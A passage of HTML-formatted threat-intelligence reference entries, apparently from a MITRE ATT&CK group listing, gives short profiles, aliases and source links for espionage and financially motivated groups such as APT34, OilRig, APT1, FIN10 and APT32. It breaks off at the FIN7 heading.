<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0055">https://attack.mitre.org/wiki/Group/G0055</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/">https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft%20Security%20Intelligence%20Report%20Volume%2021%20English.pdf">http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft%20Security%20Intelligence%20Report%20Volume%2021%20English.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt34_g0057"><a class="anchor" href="#_apt34_g0057"></a><a class="link" href="#_apt34_g0057">APT34 - G0057</a></h3>
<div class="paragraph">
<p>APT34 is an Iranian cyber espionage group that has been active since at least 2014. The group has targeted a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. APT34 loosely aligns with public reporting related to OilRig, but may not wholly align due to companies tracking threat groups in different ways. (Citation: FireEye APT34 Dec 2017)</p>
</div>
<div class="paragraph">
<p>APT34 - G0057 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT34</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 928. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0057">https://attack.mitre.org/wiki/Group/G0057</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html">https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_moafee_g0002"><a class="anchor" href="#_moafee_g0002"></a><a class="link" href="#_moafee_g0002">Moafee - G0002</a></h3>
<div class="paragraph">
<p>Moafee is a threat group that appears to operate from the Guandong Province of China. Due to overlapping TTPs, including similar custom tools, Moafee is thought to have a direct or indirect relationship with the threat group DragonOK. (Citation: Haq 2014)</p>
</div>
<div class="paragraph">
<p>Moafee - G0002 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Moafee</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 929. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0002">https://attack.mitre.org/wiki/Group/G0002</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html">https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_threat_group_3390_g0027"><a class="anchor" href="#_threat_group_3390_g0027"></a><a class="link" href="#_threat_group_3390_g0027">Threat Group-3390 - G0027</a></h3>
<div class="paragraph">
<p>Threat Group-3390 is a Chinese threat group that has extensively used strategic Web compromises to target victims. (Citation: Dell TG-3390) The group has targeted organizations in the aerospace, government, defense, technology, energy, and manufacturing sectors. (Citation: SecureWorks BRONZE UNION June 2017)</p>
</div>
<div class="paragraph">
<p>Threat Group-3390 - G0027 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Threat Group-3390</p>
</li>
<li>
<p>TG-3390</p>
</li>
<li>
<p>Emissary Panda</p>
</li>
<li>
<p>BRONZE UNION</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 930. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0027">https://attack.mitre.org/wiki/Group/G0027</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/">http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.secureworks.com/research/bronze-union">https://www.secureworks.com/research/bronze-union</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dragonok_g0017"><a class="anchor" href="#_dragonok_g0017"></a><a class="link" href="#_dragonok_g0017">DragonOK - G0017</a></h3>
<div class="paragraph">
<p>DragonOK is a threat group that has targeted Japanese organizations with phishing emails. Due to overlapping TTPs, including similar custom tools, DragonOK is thought to have a direct or indirect relationship with the threat group Moafee. (Citation: Operation Quantum Entanglement) It is known to use a variety of malware, including Sysget/HelloBridge, PlugX, PoisonIvy, FormerFirstRat, NFlog, and NewCT. (Citation: New DragonOK)</p>
</div>
<div class="paragraph">
<p>DragonOK - G0017 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>DragonOK</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 931. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0017">https://attack.mitre.org/wiki/Group/G0017</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/">http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt1_g0006"><a class="anchor" href="#_apt1_g0006"></a><a class="link" href="#_apt1_g0006">APT1 - G0006</a></h3>
<div class="paragraph">
<p>APT1 is a Chinese threat group that has been attributed to the 2nd Bureau of the Peoples Liberation Army (PLA) General Staff Departments (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398. (Citation: Mandiant APT1)</p>
</div>
<div class="paragraph">
<p>APT1 - G0006 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT1</p>
</li>
<li>
<p>Comment Crew</p>
</li>
<li>
<p>Comment Group</p>
</li>
<li>
<p>Comment Panda</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 932. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0006">https://attack.mitre.org/wiki/Group/G0006</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fin10_g0051"><a class="anchor" href="#_fin10_g0051"></a><a class="link" href="#_fin10_g0051">FIN10 - G0051</a></h3>
<div class="paragraph">
<p>FIN10 is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations. (Citation: FireEye FIN10 June 2017)</p>
</div>
<div class="paragraph">
<p>FIN10 - G0051 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FIN10</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 933. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0051">https://attack.mitre.org/wiki/Group/G0051</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_oilrig_g0049"><a class="anchor" href="#_oilrig_g0049"></a><a class="link" href="#_oilrig_g0049">OilRig - G0049</a></h3>
<div class="paragraph">
<p>OilRig is a threat group with suspected Iranian origins that has targeted Middle Eastern and international victims since at least 2015. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. (Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook OilRig Dec 2017) Reporting on OilRig may loosely overlap with APT34, but may not wholly align due to companies tracking groups in different ways. (Citation: FireEye APT34 Dec 2017)</p>
</div>
<div class="paragraph">
<p>Contributors: Robert Falcone, Bryan Lee</p>
</div>
<div class="paragraph">
<p>OilRig - G0049 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>OilRig</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 934. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0049">https://attack.mitre.org/wiki/Group/G0049</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/">http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.clearskysec.com/oilrig/">http://www.clearskysec.com/oilrig/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/">http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/">http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pan-unit42.github.io/playbook%20viewer/">https://pan-unit42.github.io/playbook%20viewer/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html">https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_charming_kitten_g0058"><a class="anchor" href="#_charming_kitten_g0058"></a><a class="link" href="#_charming_kitten_g0058">Charming Kitten - G0058</a></h3>
<div class="paragraph">
<p>is an Iranian cyber espionage group that has been active since approximately 2014. They appear to focus on targeting individuals of interest to Iran who work in academic research, human rights, and media, with most victims having been located in Iran, the US, Israel, and the UK. usually tries to access private email and Facebook accounts, and sometimes establishes a foothold on victim computers as a secondary objective. The group&#8217;s TTPs overlap extensively with another group, Rocket Kitten, resulting in reporting that may not distinguish between the two groups' activities. (Citation: ClearSky Charming Kitten Dec 2017)</p>
</div>
<div class="paragraph">
<p>Charming Kitten - G0058 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Charming Kitten</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 935. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0058">https://attack.mitre.org/wiki/Group/G0058</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.clearskysec.com/wp-content/uploads/2017/12/Charming%20Kitten%202017.pdf">http://www.clearskysec.com/wp-content/uploads/2017/12/Charming%20Kitten%202017.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fin5_g0053"><a class="anchor" href="#_fin5_g0053"></a><a class="link" href="#_fin5_g0053">FIN5 - G0053</a></h3>
<div class="paragraph">
<p>FIN5 is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian. (Citation: FireEye Respond Webinar July 2017) (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)</p>
</div>
<div class="paragraph">
<p>Contributors: Walker Johnson</p>
</div>
<div class="paragraph">
<p>FIN5 - G0053 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FIN5</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 936. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0053">https://attack.mitre.org/wiki/Group/G0053</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/WBNR-Are-you-ready-to-respond.html">https://www2.fireeye.com/WBNR-Are-you-ready-to-respond.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.youtube.com/watch?v=fevGZs0EQu8">https://www.youtube.com/watch?v=fevGZs0EQu8</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?">https://www.darkreading.com/analytics/prolific-cybercrime-gang-favors-legit-login-credentials/d/d-id/1322645?</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_taidoor_g0015"><a class="anchor" href="#_taidoor_g0015"></a><a class="link" href="#_taidoor_g0015">Taidoor - G0015</a></h3>
<div class="paragraph">
<p>Taidoor is a threat group that has operated since at least 2009 and has primarily targeted the Taiwanese government. (Citation: TrendMicro Taidoor)</p>
</div>
<div class="paragraph">
<p>Taidoor - G0015 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Taidoor</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 937. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0015">https://attack.mitre.org/wiki/Group/G0015</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp%20the%20taidoor%20campaign.pdf">http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp%20the%20taidoor%20campaign.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_night_dragon_g0014"><a class="anchor" href="#_night_dragon_g0014"></a><a class="link" href="#_night_dragon_g0014">Night Dragon - G0014</a></h3>
<div class="paragraph">
<p>Night Dragon is a threat group that has conducted activity originating primarily in China. (Citation: McAfee Night Dragon)</p>
</div>
<div class="paragraph">
<p>Night Dragon - G0014 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Night Dragon</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 938. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0014">https://attack.mitre.org/wiki/Group/G0014</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.mcafee.com/us/resources/white-papers/wp-global-energy-cyberattacks-night-dragon.pdf">http://www.mcafee.com/us/resources/white-papers/wp-global-energy-cyberattacks-night-dragon.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_naikon_g0019"><a class="anchor" href="#_naikon_g0019"></a><a class="link" href="#_naikon_g0019">Naikon - G0019</a></h3>
<div class="paragraph">
<p>Naikon is a threat group that has focused on targets around the South China Sea. (Citation: Baumgartner Naikon 2015) The group has been attributed to the Chinese Peoples Liberation Armys (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau (Military Unit Cover Designator 78020). (Citation: CameraShy) While Naikon shares some characteristics with APT30, the two groups do not appear to be exact matches. (Citation: Baumgartner Golovkin Naikon 2015)</p>
</div>
<div class="paragraph">
<p>Naikon - G0019 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Naikon</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 939. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0019">https://attack.mitre.org/wiki/Group/G0019</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf">https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://cdn2.hubspot.net/hubfs/454298/Project%20CAMERASHY%20ThreatConnect%20Copyright%202015.pdf">http://cdn2.hubspot.net/hubfs/454298/Project%20CAMERASHY%20ThreatConnect%20Copyright%202015.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/the-naikon-apt/69953/">https://securelist.com/the-naikon-apt/69953/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ke3chang_g0004"><a class="anchor" href="#_ke3chang_g0004"></a><a class="link" href="#_ke3chang_g0004">Ke3chang - G0004</a></h3>
<div class="paragraph">
<p>Ke3chang is a threat group attributed to actors operating out of China. (Citation: Villeneuve et al 2014)</p>
</div>
<div class="paragraph">
<p>Ke3chang - G0004 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Ke3chang</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 940. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0004">https://attack.mitre.org/wiki/Group/G0004</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt32_g0050"><a class="anchor" href="#_apt32_g0050"></a><a class="link" href="#_apt32_g0050">APT32 - G0050</a></h3>
<div class="paragraph">
<p>APT32 is a threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as with foreign governments, dissidents, and journalists, and has extensively used strategic web compromises to compromise victims. The group is believed to be Vietnam-based. (Citation: FireEye APT32 May 2017) (Citation: Volexity OceanLotus Nov 2017)</p>
</div>
<div class="paragraph">
<p>APT32 - G0050 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT32</p>
</li>
<li>
<p>OceanLotus Group</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 941. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0050">https://attack.mitre.org/wiki/Group/G0050</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html">https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/">https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_patchwork_g0040"><a class="anchor" href="#_patchwork_g0040"></a><a class="link" href="#_patchwork_g0040">Patchwork - G0040</a></h3>
<div class="paragraph">
<p>Patchwork is a threat group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. Much of the code used by this group was copied and pasted from online forums. (Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork)</p>
</div>
<div class="paragraph">
<p>Patchwork - G0040 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Patchwork</p>
</li>
<li>
<p>Dropping Elephant</p>
</li>
<li>
<p>Chinastrats</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 942. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0040">https://attack.mitre.org/wiki/Group/G0040</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling%20Patchwork.pdf">https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling%20Patchwork.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries">http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt30_g0013"><a class="anchor" href="#_apt30_g0013"></a><a class="link" href="#_apt30_g0013">APT30 - G0013</a></h3>
<div class="paragraph">
<p>APT30 is a threat group suspected to be associated with the Chinese government. (Citation: FireEye APT30) While Naikon shares some characteristics with APT30, the two groups do not appear to be exact matches. (Citation: Baumgartner Golovkin Naikon 2015)</p>
</div>
<div class="paragraph">
<p>APT30 - G0013 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT30</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 943. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0013">https://attack.mitre.org/wiki/Group/G0013</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/the-naikon-apt/69953/">https://securelist.com/the-naikon-apt/69953/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_monsoon_g0042"><a class="anchor" href="#_monsoon_g0042"></a><a class="link" href="#_monsoon_g0042">MONSOON - G0042</a></h3>
<div class="paragraph">
<p>MONSOON is the name of an espionage campaign that apparently started in December 2015 and was ongoing as of July 2016. It is believed that the actors behind MONSOON are the same actors behind Operation Hangover. While attribution is unclear, the campaign has targeted victims with military and political interests in the Indian Subcontinent. (Citation: Forcepoint Monsoon) Operation Hangover has been reported as being Indian in origin, and can be traced back to 2010. (Citation: Operation Hangover May 2013)</p>
</div>
<div class="paragraph">
<p>MONSOON - G0042 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>MONSOON</p>
</li>
<li>
<p>Operation Hangover</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 944. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0042">https://attack.mitre.org/wiki/Group/G0042</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf">https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling%20an%20Indian%20Cyberattack%20Infrastructure.pdf">http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling%20an%20Indian%20Cyberattack%20Infrastructure.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt17_g0025"><a class="anchor" href="#_apt17_g0025"></a><a class="link" href="#_apt17_g0025">APT17 - G0025</a></h3>
<div class="paragraph">
<p>APT17 is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations. (Citation: FireEye APT17)</p>
</div>
<div class="paragraph">
<p>APT17 - G0025 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT17</p>
</li>
<li>
<p>Deputy Dog</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 945. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0025">https://attack.mitre.org/wiki/Group/G0025</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/fireye/images/APT17%20Report.pdf">https://www2.fireeye.com/rs/fireye/images/APT17%20Report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fin7_g0046"><a class="anchor" href="#_fin7_g0046"></a><a class="link" href="#_fin7_g0046">FIN7 - G0046</a></h3>
<div class="paragraph">
